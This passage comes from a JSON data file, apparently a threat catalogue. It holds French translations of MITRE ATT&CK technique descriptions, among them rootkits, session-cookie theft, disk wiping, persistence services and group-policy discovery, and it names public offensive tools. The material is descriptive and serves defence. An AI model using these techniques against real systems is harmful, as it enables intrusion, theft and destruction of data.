Win32. (Citation: Wikipedia Windows Library Files) Le chargeur de module peut charger des DLL :* via la sp\u00e9cification du chemin d\u2019acc\u00e8s DLL (complet ou relatif) dans le r\u00e9pertoire IMPORT ; * via EXPORT transf\u00e9r\u00e9 vers une autre DLL, sp\u00e9cifi\u00e9e avec un chemin d\u2019acc\u00e8s (complet ou relatif) (mais sans extension); * via une jonction NTFS ou un programme de lien symbolique.exe.local avec le chemin d\u2019acc\u00e8s complet ou relatif d\u2019un r\u00e9pertoire contenant les DLL sp\u00e9cifi\u00e9es dans le r\u00e9pertoire IMPORT ou les EXPORTs transf\u00e9r\u00e9es ; * via <file name=\"filename.extension\u00a0\u00bb loadFrom=\"full-qualified or relative pathname\"> dans un \u00ab\u00a0manifeste d\u2019application\u00a0\u00bb int\u00e9gr\u00e9 ou externe. Le nom de fichier fait r\u00e9f\u00e9rence \u00e0 une entr\u00e9e dans le r\u00e9pertoire IMPORT ou \u00e0 une EXPORT transf\u00e9r\u00e9e. Les adversaires peuvent utiliser cette fonctionnalit\u00e9 comme un moyen d\u2019ex\u00e9cuter des charges utiles arbitraires sur un syst\u00e8me victime. Par exemple, les logiciels malveillants peuvent ex\u00e9cuter des modules de partage pour charger des composants ou des fonctionnalit\u00e9s suppl\u00e9mentaires.\nhttps://attack.mitre.org/techniques/T1129\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1602 - Donn\u00e9es du r\u00e9f\u00e9rentiel de configuration", - "description": "Les adversaires peuvent collecter des donn\u00e9es relatives aux appareils g\u00e9r\u00e9s \u00e0 partir de r\u00e9f\u00e9rentiels de configuration. Les r\u00e9f\u00e9rentiels de configuration sont utilis\u00e9s par les syst\u00e8mes de gestion pour configurer, g\u00e9rer et contr\u00f4ler les donn\u00e9es sur les syst\u00e8mes distants. Les r\u00e9f\u00e9rentiels de configuration peuvent \u00e9galement faciliter l\u2019acc\u00e8s et l\u2019administration \u00e0 distance des p\u00e9riph\u00e9riques. Les adversaires peuvent cibler ces r\u00e9f\u00e9rentiels afin de collecter de grandes quantit\u00e9s de donn\u00e9es sensibles d\u2019administration syst\u00e8me. Les donn\u00e9es des r\u00e9f\u00e9rentiels de configuration peuvent \u00eatre expos\u00e9es par divers protocoles et logiciels et peuvent stocker une grande vari\u00e9t\u00e9 de donn\u00e9es, dont une grande partie peut s\u2019aligner sur les objectifs de d\u00e9couverte adverses. (R\u00e9f\u00e9rence : US-CERT-TA18-106A) (Citation : US-CERT TA17-156A SNMP Abuse 2017)\nhttps://attack.mitre.org/techniques/T1602\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1006 - Acc\u00e8s direct au volume", - "description": "Les adversaires peuvent acc\u00e9der directement \u00e0 un volume pour contourner les contr\u00f4les d\u2019acc\u00e8s aux fichiers et la surveillance du syst\u00e8me de fichiers. Windows permet aux programmes d\u2019avoir un acc\u00e8s direct aux volumes logiques. Les programmes avec acc\u00e8s direct peuvent lire et \u00e9crire des fichiers directement \u00e0 partir du lecteur en analysant les structures de donn\u00e9es du syst\u00e8me de fichiers. Cette technique contourne les contr\u00f4les d\u2019acc\u00e8s aux fichiers Windows ainsi que les outils de surveillance du syst\u00e8me de fichiers. (Citation : Hakobyan 2009) Des utilitaires, tels que NinjaCopy, existent pour effectuer ces actions dans PowerShell. (Citation: Github PowerSploit Ninjacopy)\nhttps://attack.mitre.org/techniques/T1006\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1014 - Rootkit", - "description": "Les adversaires peuvent utiliser des rootkits pour masquer la pr\u00e9sence de programmes, de fichiers, de connexions r\u00e9seau, de services, de pilotes et d\u2019autres composants syst\u00e8me. Les rootkits sont des programmes qui cachent l\u2019existence de logiciels malveillants en interceptant/accrochant et en modifiant les appels d\u2019API du syst\u00e8me d\u2019exploitation qui fournissent des informations syst\u00e8me. (R\u00e9f\u00e9rence : Rootkits Windows Symantec) Les rootkits ou rootkits permettant la fonctionnalit\u00e9 peuvent r\u00e9sider au niveau de l\u2019utilisateur ou du noyau dans le syst\u00e8me d\u2019exploitation ou \u00e0 un niveau inf\u00e9rieur, pour inclure un hyperviseur, un Master Boot Record ou [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Rootkit Wikipedia) Des rootkits ont \u00e9t\u00e9 vus pour les syst\u00e8mes Windows, Linux et Mac OS X. (Citation: Rootkit Linux CrowdStrike) (Citation : BlackHat Mac OSX Rootkit)\nhttps://attack.mitre.org/techniques/T1014\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1123 - Capture audio", - "description": "Un adversaire peut tirer parti des p\u00e9riph\u00e9riques (p. ex., microphones et webcams) ou des applications (p. ex., services d\u2019appels vocaux et vid\u00e9o) d\u2019un ordinateur pour capturer des enregistrements audio dans le but d\u2019\u00e9couter des conversations sensibles afin de recueillir des renseignements. Des logiciels malveillants ou des scripts peuvent \u00eatre utilis\u00e9s pour interagir avec les appareils via une API disponible fournie par le syst\u00e8me d\u2019exploitation ou une application pour capturer l\u2019audio. Les fichiers audio peuvent \u00eatre \u00e9crits sur le disque et exfiltr\u00e9s ult\u00e9rieurement.\nhttps://attack.mitre.org/techniques/T1123\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1543 - Cr\u00e9er ou modifier un processus syst\u00e8me", - "description": "Les adversaires peuvent cr\u00e9er ou modifier des processus au niveau du syst\u00e8me pour ex\u00e9cuter de mani\u00e8re r\u00e9p\u00e9t\u00e9e des charges utiles malveillantes dans le cadre de la persistance. Lorsque les syst\u00e8mes d\u2019exploitation d\u00e9marrent, ils peuvent d\u00e9marrer des processus qui ex\u00e9cutent des fonctions syst\u00e8me en arri\u00e8re-plan. Sous Windows et Linux, ces processus syst\u00e8me sont appel\u00e9s services. (R\u00e9f\u00e9rence : Services TechNet) Sous macOS, les processus lanc\u00e9s appel\u00e9s [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) et [Launch Agent](https://attack.mitre.org/techniques/T1543/001) sont ex\u00e9cut\u00e9s pour terminer l\u2019initialisation du syst\u00e8me et charger les param\u00e8tres sp\u00e9cifiques \u00e0 l\u2019utilisateur. (Citation : AppleDocs Launch Agent Daemons) Les adversaires peuvent installer de nouveaux services, d\u00e9mons ou agents qui peuvent \u00eatre configur\u00e9s pour s\u2019ex\u00e9cuter au d\u00e9marrage ou \u00e0 un intervalle reproductible afin d\u2019\u00e9tablir la persistance. De m\u00eame, les adversaires peuvent modifier les services, d\u00e9mons ou agents existants pour obtenir le m\u00eame effet. Les services, d\u00e9mons ou agents peuvent \u00eatre cr\u00e9\u00e9s avec des privil\u00e8ges d\u2019administrateur, mais ex\u00e9cut\u00e9s sous des privil\u00e8ges root/SYSTEM. Les adversaires peuvent tirer parti de cette fonctionnalit\u00e9 pour cr\u00e9er ou modifier des processus syst\u00e8me afin d\u2019augmenter les privil\u00e8ges. (Citation : D\u00e9tection de logiciels malveillants OSX)\nhttps://attack.mitre.org/techniques/T1543\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1133 - Services \u00e0 distance externes", - "description": "Les adversaires peuvent tirer parti des services distants externes pour acc\u00e9der initialement \u00e0 un r\u00e9seau et/ou persister au sein de celui-ci. Les services distants tels que les VPN, Citrix et d\u2019autres m\u00e9canismes d\u2019acc\u00e8s permettent aux utilisateurs de se connecter aux ressources r\u00e9seau internes de l\u2019entreprise \u00e0 partir d\u2019emplacements externes. Il existe souvent des passerelles de services distants qui g\u00e8rent les connexions et l\u2019authentification des informations d\u2019identification pour ces services. Des services tels que [Gestion \u00e0 distance Windows](https://attack.mitre.org/techniques/T1021/006) et [VNC](https://attack.mitre.org/techniques/T1021/005) peuvent \u00e9galement \u00eatre utilis\u00e9s en externe. (Citation: Logiciel MacOS VNC pour Remote Desktop) L\u2019acc\u00e8s \u00e0 [Comptes valides](https://attack.mitre.org/techniques/T1078) pour utiliser le service est souvent une exigence, qui peut \u00eatre obtenue par le biais de la pr\u00e9servation des informations d\u2019identification ou en obtenant les informations d\u2019identification des utilisateurs apr\u00e8s avoir compromis le r\u00e9seau d\u2019entreprise. (Citation : Volexity Virtual Private Keylogging) L\u2019acc\u00e8s aux services distants peut \u00eatre utilis\u00e9 comme m\u00e9canisme d\u2019acc\u00e8s redondant ou persistant pendant une op\u00e9ration. L\u2019acc\u00e8s peut \u00e9galement \u00eatre obtenu via un service expos\u00e9 qui ne n\u00e9cessite pas d\u2019authentification. Dans les environnements conteneuris\u00e9s, cela peut inclure une API Docker expos\u00e9e, un serveur d\u2019API Kubernetes, kubelet ou une application Web telle que le tableau de bord Kubernetes. (Citation : Serveur Docker expos\u00e9 par Trend Micro) (Citation : Unit\u00e9 42 Hildegard Malware)\nhttps://attack.mitre.org/techniques/T1133\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1539 - Voler le cookie de session Web", - "description": "Un adversaire peut voler des cookies d\u2019application Web ou de session de service et les utiliser pour acc\u00e9der \u00e0 des applications Web ou \u00e0 des services Internet en tant qu\u2019utilisateur authentifi\u00e9 sans avoir besoin d\u2019informations d\u2019identification. Les applications et services Web utilisent souvent des cookies de session comme jeton d\u2019authentification apr\u00e8s qu\u2019un utilisateur s\u2019est authentifi\u00e9 sur un site Web. Les cookies sont souvent valables pour une p\u00e9riode prolong\u00e9e, m\u00eame si l\u2019application Web n\u2019est pas utilis\u00e9e activement. Les cookies peuvent \u00eatre trouv\u00e9s sur le disque, dans la m\u00e9moire de processus du navigateur et dans le trafic r\u00e9seau vers les syst\u00e8mes distants. En outre, d\u2019autres applications sur la machine cible peuvent stocker des cookies d\u2019authentification sensibles en m\u00e9moire (par exemple, des applications qui s\u2019authentifient aupr\u00e8s de services cloud). Les cookies de session peuvent \u00eatre utilis\u00e9s pour contourner certains protocoles d\u2019authentification multifacteur. (Citation: Pass The Cookie) Il existe plusieurs exemples de logiciels malveillants ciblant les cookies des navigateurs Web sur le syst\u00e8me local. (Citation : Kaspersky TajMahal avril 2019) (Citation: Unit\u00e9 42 Mac Crypto Cookies Janvier 2019) Il existe \u00e9galement des frameworks open source tels que Evilginx 2 et Muraena qui peuvent collecter des cookies de session via un proxy malveillant (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) qui peuvent \u00eatre configur\u00e9s par un adversaire et utilis\u00e9s dans des campagnes de phishing. (Citation: Github evilginx2) (Citation: GitHub Mauraena) Une fois qu\u2019un adversaire a acquis un cookie valide, il peut ex\u00e9cuter une technique [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) pour se connecter \u00e0 l\u2019application Web correspondante.\nhttps://attack.mitre.org/techniques/T1539\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1578 - Modifier l\u2019infrastructure de calcul cloud", - "description": "Un adversaire peut tenter de modifier l\u2019infrastructure de service de calcul d\u2019un compte cloud pour \u00e9chapper aux d\u00e9fenses. Une modification de l\u2019infrastructure de service de calcul peut inclure la cr\u00e9ation, la suppression ou la modification d\u2019un ou plusieurs composants tels que des instances de calcul, des machines virtuelles et des instantan\u00e9s. Les autorisations obtenues gr\u00e2ce \u00e0 la modification des composants de l\u2019infrastructure peuvent contourner les restrictions qui emp\u00eachent l\u2019acc\u00e8s \u00e0 l\u2019infrastructure existante. La modification des composants de l\u2019infrastructure peut \u00e9galement permettre \u00e0 un adversaire d\u2019\u00e9chapper \u00e0 la d\u00e9tection et d\u2019\u00e9liminer les preuves de sa pr\u00e9sence. (Citation: Mandiant M-Trends 2020)\nhttps://attack.mitre.org/techniques/T1578\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1069 - D\u00e9tection des groupes d\u2019autorisations", - "description": "Les adversaires peuvent tenter de d\u00e9couvrir les param\u00e8tres de groupe et d\u2019autorisation. Ces informations peuvent aider les adversaires \u00e0 d\u00e9terminer quels comptes d\u2019utilisateurs et groupes sont disponibles, l\u2019appartenance des utilisateurs \u00e0 des groupes particuliers et quels utilisateurs et groupes disposent d\u2019autorisations \u00e9lev\u00e9es. Les adversaires peuvent tenter de d\u00e9couvrir les param\u00e8tres d\u2019autorisation de groupe de diff\u00e9rentes mani\u00e8res. Ces donn\u00e9es peuvent fournir \u00e0 l\u2019adversaire des informations sur l\u2019environnement compromis qui peuvent \u00eatre utilis\u00e9es dans les activit\u00e9s de suivi et de ciblage. (Citation: CrowdStrike BloodHound avril 2018)\nhttps://attack.mitre.org/techniques/T1069\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1114 - Collecte d\u2019e-mails", - "description": "Les adversaires peuvent cibler les e-mails des utilisateurs pour collecter des informations sensibles. Les courriels peuvent contenir des donn\u00e9es sensibles, y compris des secrets commerciaux ou des informations personnelles, qui peuvent s\u2019av\u00e9rer pr\u00e9cieuses pour les adversaires. Les adversaires peuvent collecter ou transf\u00e9rer des e-mails \u00e0 partir de serveurs de messagerie ou de clients.\nhttps://attack.mitre.org/techniques/T1114\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1594 - Rechercher des sites Web appartenant \u00e0 des victimes", - "description": "Les adversaires peuvent rechercher sur les sites Web appartenant \u00e0 la victime des informations pouvant \u00eatre utilis\u00e9es lors du ciblage. Les sites Web appartenant aux victimes peuvent contenir divers d\u00e9tails, notamment les noms des d\u00e9partements ou des divisions, les emplacements physiques et les donn\u00e9es sur les employ\u00e9s cl\u00e9s, telles que les noms, les r\u00f4les et les coordonn\u00e9es (p. ex., [Adresses \u00e9lectroniques](https://attack.mitre.org/techniques/T1589/002)). Ces sites peuvent \u00e9galement contenir des d\u00e9tails mettant en \u00e9vidence les op\u00e9rations et les relations commerciales. (Citation : Fuite de Comparitech) Les adversaires peuvent effectuer des recherches sur les sites Web appartenant aux victimes pour recueillir des informations exploitables. Les informations provenant de ces sources peuvent r\u00e9v\u00e9ler des possibilit\u00e9s de reconnaissance (p. ex., [Hame\u00e7onnage \u00e0 des fins d\u2019information](https://attack.mitre.org/techniques/T1598) ou [Recherche dans des bases de donn\u00e9es techniques ouvertes](https://attack.mitre.org/techniques/T1596)), d\u2019\u00e9tablissement de ressources op\u00e9rationnelles (p. ex., [\u00c9tablir des comptes](https://attack.mitre.org/techniques/T1585) ou [Comptes compromis] (https://attack.mitre.org/techniques/T1586)), et/ou d\u2019acc\u00e8s initial (p. ex. : [Approuv\u00e9 Relation](https://attack.mitre.org/techniques/T1199) ou [Hame\u00e7onnage](https://attack.mitre.org/techniques/T1566)).\nhttps://attack.mitre.org/techniques/T1594\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1561 - Effacement du disque", - "description": "Les adversaires peuvent effacer ou corrompre les donn\u00e9es brutes du disque sur des syst\u00e8mes sp\u00e9cifiques ou en grand nombre dans un r\u00e9seau pour interrompre la disponibilit\u00e9 des ressources syst\u00e8me et r\u00e9seau. Avec un acc\u00e8s direct en \u00e9criture \u00e0 un disque, les adversaires peuvent tenter d\u2019\u00e9craser des parties des donn\u00e9es du disque. Les adversaires peuvent choisir d\u2019effacer des portions arbitraires de donn\u00e9es de disque et/ou d\u2019effacer les structures de disque telles que l\u2019enregistrement de d\u00e9marrage principal (MBR). Un effacement complet de tous les secteurs du disque peut \u00eatre tent\u00e9. Pour maximiser l\u2019impact sur l\u2019organisation cible dans les op\u00e9rations o\u00f9 l\u2019interruption de la disponibilit\u00e9 \u00e0 l\u2019\u00e9chelle du r\u00e9seau est l\u2019objectif, les logiciels malveillants utilis\u00e9s pour effacer les disques peuvent avoir des fonctionnalit\u00e9s de type ver pour se propager sur un r\u00e9seau en exploitant des techniques suppl\u00e9mentaires telles que [Comptes valides](https://attack.mitre.org/techniques/T1078), [Dumping des informations d\u2019identification du syst\u00e8me d\u2019exploitation](https://attack.mitre.org/techniques/T1003) et [Partages d\u2019administrateurs SMB/Windows](https://attack.mitre.org/techniques/T1021/002). (Citation: Novetta Blockbuster Destructive Malware) Sur les p\u00e9riph\u00e9riques r\u00e9seau, les adversaires peuvent effacer les fichiers de configuration et d\u2019autres donn\u00e9es du p\u00e9riph\u00e9rique \u00e0 l\u2019aide de commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que \u00ab effacer \u00bb. (R\u00e9f\u00e9rence : erase_cmd_cisco)\nhttps://attack.mitre.org/techniques/T1561\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1615 - D\u00e9couverte de strat\u00e9gie de groupe", - "description": "Les adversaires peuvent recueillir des informations sur les param\u00e8tres de strat\u00e9gie de groupe pour identifier les chemins d\u2019escalade des privil\u00e8ges, les mesures de s\u00e9curit\u00e9 appliqu\u00e9es dans un domaine et pour d\u00e9couvrir des mod\u00e8les dans les objets de domaine qui peuvent \u00eatre manipul\u00e9s ou utilis\u00e9s pour se fondre dans l\u2019environnement. La strat\u00e9gie de groupe permet une gestion centralis\u00e9e des param\u00e8tres utilisateur et ordinateur dans Active Directory (AD). Les objets de strat\u00e9gie de groupe (GPO) sont des conteneurs pour les param\u00e8tres de strat\u00e9gie de groupe constitu\u00e9s de fichiers stock\u00e9s dans un chemin r\u00e9seau pr\u00e9visible '\\\\SYSVOL\\\\Policies\\'. (R\u00e9f\u00e9rence : Principes de base de la strat\u00e9gie de groupe TechNet) (R\u00e9f\u00e9rence : ADSecurity GPO Persistence 2016) Les adversaires peuvent utiliser des commandes telles que gpresult ou diverses fonctions PowerShell accessibles au public, telles que Get-DomainGPO et Get-DomainGPOLocalGroup, pour collecter des informations sur les param\u00e8tres de strat\u00e9gie de groupe. (Citation : Microsoft gpresult) (Citation : Github PowerShell Empire) Les adversaires peuvent utiliser ces informations pour fa\u00e7onner les comportements de suivi, notamment en d\u00e9terminant les trajectoires d\u2019attaque potentielles au sein du r\u00e9seau cible ainsi que les possibilit\u00e9s de manipuler les param\u00e8tres de strat\u00e9gie de groupe (c\u2019est-\u00e0-dire [Modification de la strat\u00e9gie de domaine](https://attack.mitre.org/techniques/T1484)) \u00e0 leur avantage.\nhttps://attack.mitre.org/techniques/T1615\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1025 - Donn\u00e9es provenant de supports amovibles", - "description": "Les adversaires peuvent rechercher des supports amovibles connect\u00e9s sur des ordinateurs qu\u2019ils ont compromis pour trouver des fichiers d\u2019int\u00e9r\u00eat. Les donn\u00e9es sensibles peuvent \u00eatre collect\u00e9es \u00e0 partir de n\u2019importe quel support amovible (lecteur de disque optique, m\u00e9moire USB, etc.) connect\u00e9 au syst\u00e8me compromis avant l\u2019Exfiltration. Des shells de commande interactifs peuvent \u00eatre utilis\u00e9s et des fonctionnalit\u00e9s communes dans [cmd](https://attack.mitre.org/software/S0106) peuvent \u00eatre utilis\u00e9es pour collecter des informations. Certains adversaires peuvent \u00e9galement utiliser [Collecte automatis\u00e9e](https://attack.mitre.org/techniques/T1119) sur des supports amovibles.\nhttps://attack.mitre.org/techniques/T1025\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1547 - Ex\u00e9cution du d\u00e9marrage automatique de d\u00e9marrage ou d\u2019ouverture de session", - "description": "Les adversaires peuvent configurer les param\u00e8tres syst\u00e8me pour ex\u00e9cuter automatiquement un programme pendant le d\u00e9marrage ou l\u2019ouverture de session du syst\u00e8me afin de maintenir la persistance ou d\u2019obtenir des privil\u00e8ges de niveau sup\u00e9rieur sur les syst\u00e8mes compromis. Les syst\u00e8mes d\u2019exploitation peuvent avoir des m\u00e9canismes pour ex\u00e9cuter automatiquement un programme au d\u00e9marrage du syst\u00e8me ou \u00e0 l\u2019ouverture de session du compte. (Citation : Microsoft Run Key) (R\u00e9f\u00e9rence : Packages d\u2019authentification MSDN) (R\u00e9f\u00e9rence : Microsoft TimeProvider) (Citation : Cylance Reg Persistence, septembre 2013) (Citation: Programmation du noyau Linux) Ces m\u00e9canismes peuvent inclure l\u2019ex\u00e9cution automatique de programmes plac\u00e9s dans des r\u00e9pertoires sp\u00e9cialement d\u00e9sign\u00e9s ou r\u00e9f\u00e9renc\u00e9s par des r\u00e9f\u00e9rentiels qui stockent des informations de configuration, tels que le Registre Windows. Un adversaire peut atteindre le m\u00eame objectif en modifiant ou en \u00e9tendant les fonctionnalit\u00e9s du noyau. \u00c9tant donn\u00e9 que certains programmes de d\u00e9marrage automatique ou d\u2019ouverture de session s\u2019ex\u00e9cutent avec des privil\u00e8ges plus \u00e9lev\u00e9s, un adversaire peut en tirer parti pour \u00e9lever les privil\u00e8ges.\nhttps://attack.mitre.org/techniques/T1547\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1600 - Affaiblir le chiffrement", - "description": "Les adversaires peuvent compromettre la capacit\u00e9 de chiffrement d\u2019un p\u00e9riph\u00e9rique r\u00e9seau afin de contourner le chiffrement qui prot\u00e9gerait autrement les communications de donn\u00e9es. (Citation : Cisco Synful Knock Evolution) Le chiffrement peut \u00eatre utilis\u00e9 pour prot\u00e9ger le trafic r\u00e9seau transmis afin de maintenir sa confidentialit\u00e9 (protection contre la divulgation non autoris\u00e9e) et son int\u00e9grit\u00e9 (protection contre les modifications non autoris\u00e9es). Les chiffrements de chiffrement sont utilis\u00e9s pour convertir un message en texte brut en texte chiffr\u00e9 et peuvent n\u00e9cessiter beaucoup de calculs pour d\u00e9chiffrer sans la cl\u00e9 de d\u00e9chiffrement associ\u00e9e. En r\u00e8gle g\u00e9n\u00e9rale, les cl\u00e9s plus longues augmentent le co\u00fbt de la cryptanalyse ou du d\u00e9chiffrement sans la cl\u00e9. Les adversaires peuvent compromettre et manipuler les appareils qui effectuent le chiffrement du trafic r\u00e9seau. Par exemple, gr\u00e2ce \u00e0 des comportements tels que [Modifier l\u2019image syst\u00e8me](https://attack.mitre.org/techniques/T1601), [R\u00e9duire l\u2019espace cl\u00e9](https://attack.mitre.org/techniques/T1600/001) et [D\u00e9sactiver le mat\u00e9riel cryptographique](https://attack.mitre.org/techniques/T1600/002), un adversaire peut affecter n\u00e9gativement et/ou \u00e9liminer la capacit\u00e9 d\u2019un p\u00e9riph\u00e9rique \u00e0 chiffrer en toute s\u00e9curit\u00e9 le trafic r\u00e9seau. Cela pose un plus grand risque de divulgation non autoris\u00e9e et peut aider \u00e0 faciliter la manipulation des donn\u00e9es, l\u2019acc\u00e8s aux justificatifs d\u2019identit\u00e9 ou les efforts de collecte. (Citation : Cisco Blog Legacy Device Attacks)\nhttps://attack.mitre.org/techniques/T1600\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1489 - Arr\u00eat de service", - "description": "Les adversaires peuvent arr\u00eater ou d\u00e9sactiver des services sur un syst\u00e8me pour rendre ces services indisponibles pour les utilisateurs l\u00e9gitimes. L\u2019arr\u00eat de services ou de processus critiques peut inhiber ou arr\u00eater la r\u00e9ponse \u00e0 un incident ou contribuer \u00e0 la r\u00e9alisation des objectifs globaux de l\u2019adversaire visant \u00e0 causer des dommages \u00e0 l\u2019environnement. (Citation : Talos Olympic Destroyer 2018) (Citation : Novetta Blockbuster) Les adversaires peuvent y parvenir en d\u00e9sactivant des services individuels de grande importance pour une organisation, tels que MSExchangeIS, ce qui rendra le contenu Exchange inaccessible (Citation : Novetta Blockbuster). Dans certains cas, les adversaires peuvent arr\u00eater ou d\u00e9sactiver plusieurs ou tous les services pour rendre les syst\u00e8mes inutilisables. (Citation : Talos Olympic Destroyer 2018) Les services ou processus peuvent ne pas permettre la modification de leurs magasins de donn\u00e9es pendant l\u2019ex\u00e9cution. Les adversaires peuvent arr\u00eater des services ou des processus afin d\u2019effectuer [Destruction des donn\u00e9es](https://attack.mitre.org/techniques/T1485) ou [Donn\u00e9es chiffr\u00e9es pour impact](https://attack.mitre.org/techniques/T1486) sur les banques de donn\u00e9es de services tels qu\u2019Exchange et SQL Server. (R\u00e9f\u00e9rence : Analyse WannaCry de SecureWorks)\nhttps://attack.mitre.org/techniques/T1489\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1652 - D\u00e9couverte de pilotes de p\u00e9riph\u00e9riques", - "description": "Les adversaires peuvent tenter d\u2019\u00e9num\u00e9rer les pilotes de p\u00e9riph\u00e9riques locaux sur un h\u00f4te victime. Les informations sur les pilotes de p\u00e9riph\u00e9riques peuvent mettre en \u00e9vidence diverses informations qui fa\u00e7onnent les comportements de suivi, tels que la fonction / l\u2019objectif de l\u2019h\u00f4te, les outils de s\u00e9curit\u00e9 actuels (c\u2019est-\u00e0-dire [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) ou d\u2019autres d\u00e9fenses (par exemple, [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), ainsi que les vuln\u00e9rabilit\u00e9s exploitables potentielles (par exemple, [Exploitation pour l\u2019escalade des privil\u00e8ges](https://attack.mitre.org/techniques/T1068)). De nombreux utilitaires du syst\u00e8me d\u2019exploitation peuvent fournir des informations sur les pilotes de p\u00e9riph\u00e9riques locaux, tels que 'driverquery.exe' et la fonction API 'EnumDeviceDrivers()' sous Windows. (R\u00e9f\u00e9rence : Microsoft Driverquery) (R\u00e9f\u00e9rence : Microsoft EnumDeviceDrivers) Des informations sur les pilotes de p\u00e9riph\u00e9riques (ainsi que sur les services associ\u00e9s, c\u2019est-\u00e0-dire [System Service Discovery](https://attack.mitre.org/techniques/T1007)) peuvent \u00e9galement \u00eatre disponibles dans le Registre. (Citation : Pilotes de registre Microsoft) Sous Linux/macOS, les pilotes de p\u00e9riph\u00e9riques (sous la forme de modules de noyau) peuvent \u00eatre visibles dans '/dev' ou \u00e0 l\u2019aide d\u2019utilitaires tels que 'lsmod' et 'modinfo'. (Citation: Programmation du noyau Linux) (Citation : lsmod man) (Citation: modinfo man)\nhttps://attack.mitre.org/techniques/T1652\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1564 - Masquer les artefacts", - "description": "Les adversaires peuvent tenter de cacher des artefacts associ\u00e9s \u00e0 leurs comportements pour \u00e9chapper \u00e0 la d\u00e9tection. Les syst\u00e8mes d\u2019exploitation peuvent avoir des fonctionnalit\u00e9s pour masquer divers artefacts, tels que des fichiers syst\u00e8me importants et l\u2019ex\u00e9cution de t\u00e2ches administratives, afin d\u2019\u00e9viter de perturber les environnements de travail des utilisateurs et d\u2019emp\u00eacher les utilisateurs de modifier les fichiers ou les fonctionnalit\u00e9s du syst\u00e8me. Les adversaires peuvent abuser de ces fonctionnalit\u00e9s pour masquer des artefacts tels que des fichiers, des r\u00e9pertoires, des comptes d\u2019utilisateurs ou d\u2019autres activit\u00e9s du syst\u00e8me afin d\u2019\u00e9chapper \u00e0 la d\u00e9tection. (Citation : Sofacy Komplex Trojan) (Citation: Cybereason OSX Pirrit) (Citation : MalwareBytes ADS juillet 2015) Les adversaires peuvent \u00e9galement tenter de masquer les artefacts associ\u00e9s \u00e0 un comportement malveillant en cr\u00e9ant des r\u00e9gions informatiques isol\u00e9es des instruments de s\u00e9curit\u00e9 courants, par exemple gr\u00e2ce \u00e0 l\u2019utilisation de la technologie de virtualisation. (Citation : Sophos Ragnar mai 2020)\nhttps://attack.mitre.org/techniques/T1564\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1080 - Contenu partag\u00e9 corrompu", - "description": "Les adversaires peuvent fournir des charges utiles \u00e0 des syst\u00e8mes distants en ajoutant du contenu \u00e0 des emplacements de stockage partag\u00e9s, tels que des lecteurs r\u00e9seau ou des r\u00e9f\u00e9rentiels de code internes. Le contenu stock\u00e9 sur des lecteurs r\u00e9seau ou dans d\u2019autres emplacements partag\u00e9s peut \u00eatre alt\u00e9r\u00e9 par l\u2019ajout de programmes malveillants, de scripts ou de code d\u2019exploitation \u00e0 des fichiers autrement valides. Une fois qu\u2019un utilisateur ouvre le contenu corrompu partag\u00e9, la partie malveillante peut \u00eatre ex\u00e9cut\u00e9e pour ex\u00e9cuter le code de l\u2019adversaire sur un syst\u00e8me distant. Les adversaires peuvent utiliser du contenu partag\u00e9 contamin\u00e9 pour se d\u00e9placer lat\u00e9ralement. Un pivot de partage de r\u00e9pertoire est une variante de cette technique qui utilise plusieurs autres techniques pour propager des logiciels malveillants lorsque les utilisateurs acc\u00e8dent \u00e0 un r\u00e9pertoire r\u00e9seau partag\u00e9. Il utilise [Raccourci Modification](https://attack.mitre.org/techniques/T1547/009) du r\u00e9pertoire . Fichiers LNK qui utilisent [Masquerading](https://attack.mitre.org/techniques/T1036) pour ressembler aux vrais r\u00e9pertoires, qui sont cach\u00e9s dans [Fichiers et r\u00e9pertoires cach\u00e9s](https://attack.mitre.org/techniques/T1564/001). Le malveillant . Les r\u00e9pertoires bas\u00e9s sur LNK ont une commande int\u00e9gr\u00e9e qui ex\u00e9cute le fichier malveillant cach\u00e9 dans le r\u00e9pertoire, puis ouvre le r\u00e9pertoire r\u00e9el pr\u00e9vu afin que l\u2019action attendue de l\u2019utilisateur se produise toujours. Lorsqu\u2019elle est utilis\u00e9e avec des annuaires r\u00e9seau fr\u00e9quemment utilis\u00e9s, la technique peut entra\u00eener des r\u00e9infections fr\u00e9quentes et un large acc\u00e8s aux syst\u00e8mes et potentiellement \u00e0 de nouveaux comptes \u00e0 privil\u00e8ges sup\u00e9rieurs. (R\u00e9f\u00e9rence : Retwin Directory Share Pivot) Les adversaires peuvent \u00e9galement compromettre les r\u00e9pertoires r\u00e9seau 